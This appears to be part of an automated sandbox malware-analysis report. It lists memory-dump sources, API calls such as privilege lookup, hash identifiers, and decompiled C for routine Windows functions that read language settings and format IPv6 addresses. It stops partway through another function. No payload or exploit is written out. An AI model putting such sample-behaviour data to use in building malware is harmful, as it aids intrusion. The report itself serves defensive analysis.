                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                    • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                    • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                    • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E00758788(signed int __ecx, void* __edx, signed int _a4) {
                                    				signed int _v8;
                                    				short* _v12;
                                    				void* _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				signed int _v60;
                                    				char _v68;
                                    				void* _t216;
                                    				intOrPtr _t231;
                                    				short* _t235;
                                    				intOrPtr _t257;
                                    				short* _t261;
                                    				intOrPtr _t284;
                                    				intOrPtr _t288;
                                    				void* _t314;
                                    				signed int _t318;
                                    				short* _t319;
                                    				intOrPtr _t321;
                                    				void* _t328;
                                    				void* _t329;
                                    				char* _t332;
                                    				signed int _t333;
                                    				signed int* _t334;
                                    				void* _t335;
                                    				void* _t338;
                                    				void* _t339;
                                    
                                    				_t328 = __edx;
                                    				_t322 = __ecx;
                                    				_t318 = 0;
                                    				_t334 = _a4;
                                    				_v8 = 0;
                                    				_v28 = 0;
                                    				_v48 = 0;
                                    				_v20 = 0;
                                    				_v40 = 0;
                                    				_v32 = 0;
                                    				_v52 = 0;
                                    				if(_t334 == 0) {
                                    					_t329 = 0xc000000d;
                                    					L49:
                                    					_t334[0x11] = _v56;
                                    					 *_t334 =  *_t334 | 0x00000800;
                                    					_t334[0x12] = _v60;
                                    					_t334[0x13] = _v28;
                                    					_t334[0x17] = _v20;
                                    					_t334[0x16] = _v48;
                                    					_t334[0x18] = _v40;
                                    					_t334[0x14] = _v32;
                                    					_t334[0x15] = _v52;
                                    					return _t329;
                                    				}
                                    				_v56 = 0;
                                    				if(E00758460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                    					_v56 = 1;
                                    					if(_v8 != 0) {
                                    						_t207 = E0073E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                    					}
                                    					_push(1);
                                    					_v8 = _t318;
                                    					E0075718A(_t207);
                                    					_t335 = _t335 + 4;
                                    				}
                                    				_v60 = _v60 | 0xffffffff;
                                    				if(E00758460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                    					_t333 =  *_v8;
                                    					_v60 = _t333;
                                    					_t314 = E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    					_push(_t333);
                                    					_v8 = _t318;
                                    					E0075718A(_t314);
                                    					_t335 = _t335 + 4;
                                    				}
                                    				_t216 = E00758460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                    				_t332 = ";";
                                    				if(_t216 < 0) {
                                    					L17:
                                    					if(E00758460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                    						L30:
                                    						if(E00758460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                    							L46:
                                    							_t329 = 0;
                                    							L47:
                                    							if(_v8 != _t318) {
                                    								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    							}
                                    							if(_v28 != _t318) {
                                    								if(_v20 != _t318) {
                                    									E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                    									_v20 = _t318;
                                    									_v40 = _t318;
                                    								}
                                    							}
                                    							goto L49;
                                    						}
                                    						_t231 = _v24;
                                    						_t322 = _t231 + 4;
                                    						_push(_t231);
                                    						_v52 = _t322;
                                    						E0075718A(_t231);
                                    						if(_t322 == _t318) {
                                    							_v32 = _t318;
                                    						} else {
                                    							_v32 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    						}
                                    						if(_v32 == _t318) {
                                    							_v52 = _t318;
                                    							L58:
                                    							_t329 = 0xc0000017;
                                    							goto L47;
                                    						} else {
                                    							E00732340(_v32, _v8, _v24);
                                    							_v16 = _v32;
                                    							_a4 = _t318;
                                    							_t235 = E0074E679(_v32, _t332);
                                    							while(1) {
                                    								_t319 = _t235;
                                    								if(_t319 == 0) {
                                    									break;
                                    								}
                                    								 *_t319 = 0;
                                    								_t321 = _t319 + 2;
                                    								E0073E2A8(_t322,  &_v68, _v16);
                                    								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    									_a4 = _a4 + 1;
                                    								}
                                    								_v16 = _t321;
                                    								_t235 = E0074E679(_t321, _t332);
                                    								_pop(_t322);
                                    							}
                                    							_t236 = _v16;
                                    							if( *_v16 != _t319) {
                                    								E0073E2A8(_t322,  &_v68, _t236);
                                    								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    									_a4 = _a4 + 1;
                                    								}
                                    							}
                                    							if(_a4 == 0) {
                                    								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                    								_v52 = _v52 & 0x00000000;
                                    								_v32 = _v32 & 0x00000000;
                                    							}
                                    							if(_v8 != 0) {
                                    								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                    							}
                                    							_v8 = _v8 & 0x00000000;
                                    							_t318 = 0;
                                    							goto L46;
                                    						}
                                    					}
                                    					_t257 = _v24;
                                    					_t322 = _t257 + 4;
                                    					_push(_t257);
                                    					_v40 = _t322;
                                    					E0075718A(_t257);
                                    					_t338 = _t335 + 4;
                                    					if(_t322 == _t318) {
                                    						_v20 = _t318;
                                    					} else {
                                    						_v20 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    					}
                                    					if(_v20 == _t318) {
                                    						_v40 = _t318;
                                    						goto L58;
                                    					} else {
                                    						E00732340(_v20, _v8, _v24);
                                    						_v16 = _v20;
                                    						_a4 = _t318;
                                    						_t261 = E0074E679(_v20, _t332);
                                    						_t335 = _t338 + 0x14;
                                    						while(1) {
                                    							_v12 = _t261;
                                    							if(_t261 == _t318) {
                                    								break;
                                    							}
                                    							_v12 = _v12 + 2;
                                    							 *_v12 = 0;
                                    							E0073E2A8(_v12,  &_v68, _v16);
                                    							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    								_a4 = _a4 + 1;
                                    							}
                                    							_v16 = _v12;
                                    							_t261 = E0074E679(_v12, _t332);
                                    							_pop(_t322);
                                    						}
                                    						_t269 = _v16;
                                    						if( *_v16 != _t318) {
                                    							E0073E2A8(_t322,  &_v68, _t269);
                                    							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    								_a4 = _a4 + 1;
                                    							}
                                    						}
                                    						if(_a4 == _t318) {
                                    							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                    							_v40 = _t318;
                                    							_v20 = _t318;
                                    						}
                                    						if(_v8 != _t318) {
                                    							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    						}
                                    						_v8 = _t318;
                                    						goto L30;
                                    					}
                                    				}
                                    				_t284 = _v24;
                                    				_t322 = _t284 + 4;
                                    				_push(_t284);
                                    				_v48 = _t322;
                                    				E0075718A(_t284);
                                    				_t339 = _t335 + 4;
                                    				if(_t322 == _t318) {
                                    					_v28 = _t318;
                                    				} else {
                                    					_v28 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    				}
                                    				if(_v28 == _t318) {
                                    					_v48 = _t318;
                                    					goto L58;
                                    				} else {
                                    					E00732340(_v28, _v8, _v24);
                                    					_v16 = _v28;
                                    					_a4 = _t318;
                                    					_t288 = E0074E679(_v28, _t332);
                                    					_t335 = _t339 + 0x14;
                                    					while(1) {
                                    						_v12 = _t288;
                                    						if(_t288 == _t318) {
                                    							break;
                                    						}
                                    						_v12 = _v12 + 2;
                                    						 *_v12 = 0;
                                    						E0073E2A8(_v12,  &_v68, _v16);
                                    						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    							_a4 = _a4 + 1;
                                    						}
                                    						_v16 = _v12;
                                    						_t288 = E0074E679(_v12, _t332);
                                    						_pop(_t322);
                                    					}
                                    					_t296 = _v16;
                                    					if( *_v16 != _t318) {
                                    						E0073E2A8(_t322,  &_v68, _t296);
                                    						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
                                    							_a4 = _a4 + 1;
                                    						}
                                    					}
                                    					if(_a4 == _t318) {
                                    						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                    						_v48 = _t318;
                                    						_v28 = _t318;
                                    					}
                                    					if(_v8 != _t318) {
                                    						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    					}
                                    					_v8 = _t318;
                                    					goto L17;
                                    				}
                                    			}





































                                    0x00758954
                                    0x00758954
                                    0x0075895a
                                    0x007a1b63
                                    0x00000000
                                    0x00758960
                                    0x00758969
                                    0x00758973
                                    0x00758976
                                    0x00758979
                                    0x0075897e
                                    0x00758981
                                    0x00758981
                                    0x00758986
                                    0x00000000
                                    0x00000000
                                    0x007a1b6e
                                    0x007a1b74
                                    0x007a1b7b
                                    0x007a1b8f
                                    0x007a1b91
                                    0x007a1b91
                                    0x007a1b99
                                    0x007a1b9c
                                    0x007a1ba2
                                    0x007a1ba2
                                    0x0075898c
                                    0x00758992
                                    0x00758999
                                    0x007589ad
                                    0x007a1ba8
                                    0x007a1ba8
                                    0x007589ad
                                    0x007589b6
                                    0x007589c8
                                    0x007589cd
                                    0x007589d0
                                    0x007589d0
                                    0x007589d6
                                    0x007589e8
                                    0x007589e8
                                    0x007589ed
                                    0x00000000
                                    0x007589ed
                                    0x0075895a
                                    0x0075883e
                                    0x00758841
                                    0x00758844
                                    0x00758845
                                    0x00758848
                                    0x0075884d
                                    0x00758852
                                    0x00758b49
                                    0x00758858
                                    0x0075886c
                                    0x0075886c
                                    0x00758872
                                    0x007a1b0e
                                    0x00000000
                                    0x00758878
                                    0x00758881
                                    0x0075888b
                                    0x0075888e
                                    0x00758891
                                    0x00758896
                                    0x00758899
                                    0x00758899
                                    0x0075889e
                                    0x00000000
                                    0x00000000
                                    0x007a1b21
                                    0x007a1b27
                                    0x007a1b2e
                                    0x007a1b42
                                    0x007a1b44
                                    0x007a1b44
                                    0x007a1b4c
                                    0x007a1b4f
                                    0x007a1b55
                                    0x007a1b55
                                    0x007588a4
                                    0x007588aa
                                    0x007588b1
                                    0x007588c5
                                    0x007a1b5b
                                    0x007a1b5b
                                    0x007588c5
                                    0x007588ce
                                    0x007588e0
                                    0x007588e5
                                    0x007588e8
                                    0x007588e8
                                    0x007588ee
                                    0x00758900
                                    0x00758900
                                    0x00758905
                                    0x00000000
                                    0x00758905

                                    APIs
                                    Strings
                                    • Kernel-MUI-Language-Disallowed, xrefs: 00758914
                                    • Kernel-MUI-Number-Allowed, xrefs: 007587E6
                                    • Kernel-MUI-Language-Allowed, xrefs: 00758827
                                    • WindowsExcludedProcs, xrefs: 007587C1
                                    • Kernel-MUI-Language-SKU, xrefs: 007589FC
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcspbrk
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 402402107-258546922
                                    • Opcode ID: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                    • Instruction ID: 0a2a6bccf57b74669135fc915fec59ba5444a59e5f638f92d9dfc0a2d4a0b0b9
                                    • Opcode Fuzzy Hash: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                    • Instruction Fuzzy Hash: 34F115B2D00209EFDF51DF94C985DEEB7B8FF08301F14446AE905A7211EB78AA45DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 38%
                                    			E007713CB(intOrPtr* _a4, intOrPtr _a8) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr* _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				intOrPtr _t71;
                                    				signed int _t78;
                                    				signed int _t86;
                                    				char _t90;
                                    				signed int _t91;
                                    				signed int _t96;
                                    				intOrPtr _t108;
                                    				signed int _t114;
                                    				void* _t115;
                                    				intOrPtr _t128;
                                    				intOrPtr* _t129;
                                    				void* _t130;
                                    
                                    				_t129 = _a4;
                                    				_t128 = _a8;
                                    				_t116 = 0;
                                    				_t71 = _t128 + 0x5c;
                                    				_v8 = 8;
                                    				_v20 = _t71;
                                    				if( *_t129 == 0) {
                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                    						goto L5;
                                    					} else {
                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                    						if(_t96 != 0) {
                                    							L38:
                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                    								goto L5;
                                    							} else {
                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                    								_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                    								L36:
                                    								return _t128 + _t86 * 2;
                                    							}
                                    						}
                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                    						if(_t114 == 0) {
                                    							L33:
                                    							_t115 = 0x732926;
                                    							L35:
                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                    							_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                    							goto L36;
                                    						}
                                    						if(_t114 != 0xffff) {
                                    							_t116 = 0;
                                    							goto L38;
                                    						}
                                    						if(_t114 != 0) {
                                    							_t115 = 0x739cac;
                                    							goto L35;
                                    						}
                                    						goto L33;
                                    					}
                                    				} else {
                                    					L5:
                                    					_a8 = _t116;
                                    					_a4 = _t116;
                                    					_v12 = _t116;
                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                    							_v8 = 6;
                                    						}
                                    					}
                                    					_t90 = _v8;
                                    					if(_t90 <= _t116) {
                                    						L11:
                                    						if(_a8 - _a4 <= 1) {
                                    							_a8 = _t116;
                                    							_a4 = _t116;
                                    						}
                                    						_t91 = 0;
                                    						if(_v8 <= _t116) {
                                    							L22:
                                    							if(_v8 < 8) {
                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                    								_t128 = _t128 + E00767707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                    							}
                                    							return _t128;
                                    						} else {
                                    							L14:
                                    							L14:
                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                    								if(_t91 != _t116 && _t91 != _a8) {
                                    									_push(":");
                                    									_push(_t71 - _t128 >> 1);
                                    									_push(_t128);
                                    									_t128 = _t128 + E00767707() * 2;
                                    									_t71 = _v20;
                                    									_t130 = _t130 + 0xc;
                                    								}
                                    								_t78 = E00767707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                    								_t130 = _t130 + 0x10;
                                    							} else {
                                    								_push(L"::");
                                    								_push(_t71 - _t128 >> 1);
                                    								_push(_t128);
                                    								_t78 = E00767707();
                                    								_t130 = _t130 + 0xc;
                                    								_t91 = _a8 - 1;
                                    							}
                                    							_t91 = _t91 + 1;
                                    							_t128 = _t128 + _t78 * 2;
                                    							_t71 = _v20;
                                    							if(_t91 >= _v8) {
                                    								goto L22;
                                    							}
                                    							_t116 = 0;
                                    							goto L14;
                                    						}
                                    					} else {
                                    						_t108 = 1;
                                    						_v16 = _t129;
                                    						_v24 = _t90;
                                    						do {
                                    							if( *_v16 == _t116) {
                                    								if(_t108 - _v12 > _a8 - _a4) {
                                    									_a4 = _v12;
                                    									_a8 = _t108;
                                    								}
                                    								_t116 = 0;
                                    							} else {
                                    								_v12 = _t108;
                                    							}
                                    							_v16 = _v16 + 2;
                                    							_t108 = _t108 + 1;
                                    							_t26 =  &_v24;
                                    							 *_t26 = _v24 - 1;
                                    						} while ( *_t26 != 0);
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                    • Instruction ID: a592f67da5e6c95447368361a62582baff0230017c4683c62d1ce5317f2ce97e
                                    • Opcode Fuzzy Hash: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                    • Instruction Fuzzy Hash: A96137B1900655EADF34CF5DC8808BE7BB5EF94300B94C52DF99A47641D27CAA40CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E00767EFD(void* __ecx, intOrPtr _a4) {
                                    				signed int _v8;
                                    				char _v540;
                                    				unsigned int _v544;
                                    				signed int _v548;
                                    				intOrPtr _v552;
                                    				char _v556;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t33;
                                    				void* _t38;
                                    				unsigned int _t46;
                                    				unsigned int _t47;
                                    				unsigned int _t52;
